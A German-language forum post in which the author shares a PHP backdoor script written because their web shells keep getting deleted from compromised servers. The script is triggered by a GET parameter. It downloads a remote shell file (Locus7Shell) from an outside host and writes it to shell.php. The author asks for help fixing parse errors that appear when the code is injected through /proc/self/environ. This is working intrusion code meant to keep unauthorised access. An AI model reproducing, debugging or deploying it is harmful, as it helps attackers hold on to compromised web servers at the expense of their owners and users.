also ich hab keine lust mehr, dass meine shells andauernd deleted werden also hab ich beschlossen mir ein backdoor script zu basteln :

Code:
<?php 
if($_GET['rykou']){
      $file = fopen("shell.php","w+"); 
      $stream = fopen ("http://usuarios.multimania.es/pilotcast/Locus7Shell.txt", "r"); 
      while(!feof($stream)) {
            $shell .=fgets($stream); 
      } 
fwrite($file, $shell); fclose($file);}
?>
das problem ist, dass es lokal funktioniert aber bei einigen funzt das eben nicht da kommen dann fehler wie:

Code:
Warning: Unexpected character in input: ' in /proc/30851/environ on line 1

Parse error: syntax error, unexpected T_STRING in /proc/30851/environ on line 1

jemand ne idee? ich vermute mal es hat was mit magic quotes zutun weil er wegen string rumheult...